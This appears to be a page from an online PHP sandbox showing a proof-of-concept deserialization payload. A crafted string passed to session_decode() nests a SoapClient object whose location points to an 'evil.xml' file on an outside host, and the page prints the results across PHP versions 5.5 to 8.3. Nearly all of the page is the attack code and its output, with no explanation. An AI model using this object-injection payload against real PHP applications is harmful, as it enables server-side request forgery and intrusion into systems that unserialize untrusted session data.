@ 2015-12-18T17:13:50Z <?php
session_start();
session_decode('test|O:9:"Exception":1:{S:19:"\00Exception\00previous";O:10:"SoapClient":3:{S:3:"uri";S:0:"";S:8:"location";S:35:"http://karmainsecurity.com/evil.xml";S:13:"_soap_version";i:1;}}');
var_dump($_SESSION);
Enable javascript to submit You have javascript disabled. You will not be able to edit any code.
Output for 8.0.0 - 8.0.30 , 8.1.0 - 8.1.27 , 8.2.0 - 8.2.17 , 8.3.0 - 8.3.4 Warning: session_decode(): Failed to decode session object. Session has been destroyed in /in/ujk9b on line 5
Fatal error: Uncaught TypeError: Cannot assign __PHP_Incomplete_Class to property Exception::$previous of type ?Throwable in /in/ujk9b:5
Stack trace:
#0 /in/ujk9b(5): session_decode('test|O:9:"Excep...')
#1 {main}
thrown in /in/ujk9b on line 5
Process exited with code 255 . Output for 5.6.28 , 7.0.20 , 7.1.0 - 7.1.25 , 7.2.0 - 7.2.33 , 7.3.0 - 7.3.33 , 7.4.0 - 7.4.33 array(1) {
["test"]=>
object(Exception)#1 (6) {
["message":protected]=>
string(0) ""
["string":"Exception":private]=>
string(0) ""
["code":protected]=>
int(0)
["file":protected]=>
string(9) "/in/ujk9b"
["line":protected]=>
int(5)
["trace":"Exception":private]=>
array(1) {
[0]=>
array(4) {
["file"]=>
string(9) "/in/ujk9b"
["line"]=>
int(5)
["function"]=>
string(14) "session_decode"
["args"]=>
array(1) {
[0]=>
string(178) "test|O:9:"Exception":1:{S:19:"\00Exception\00previous";O:10:"SoapClient":3:{S:3:"uri";S:0:"";S:8:"location";S:35:"http://karmainsecurity.com/evil.xml";S:13:"_soap_version";i:1;}}"
}
}
}
}
}
Output for 5.5.0 - 5.5.38 , 5.6.0 - 5.6.25 , 7.0.0 - 7.0.10 array(1) {
["test"]=>
object(Exception)#1 (7) {
["message":protected]=>
string(0) ""
["string":"Exception":private]=>
string(0) ""
["code":protected]=>
int(0)
["file":protected]=>
string(9) "/in/ujk9b"
["line":protected]=>
int(5)
["trace":"Exception":private]=>
array(1) {
[0]=>
array(4) {
["file"]=>
string(9) "/in/ujk9b"
["line"]=>
int(5)
["function"]=>
string(14) "session_decode"
["args"]=>
array(1) {
[0]=>
string(178) "test|O:9:"Exception":1:{S:19:"\00Exception\00previous";O:10:"SoapClient":3:{S:3:"uri";S:0:"";S:8:"location";S:35:"http://karmainsecurity.com/evil.xml";S:13:"_soap_version";i:1;}}"
}
}
}
["previous":"Exception":private]=>
object(__PHP_Incomplete_Class)#2 (4) {
["__PHP_Incomplete_Class_Name"]=>
string(10) "SoapClient"
["uri"]=>
string(0) ""
["location"]=>
string(35) "http://karmainsecurity.com/evil.xml"
["_soap_version"]=>
int(1)
}
}
}
preferences:dark mode live preview
209.74 ms | 404 KiB | 236 Q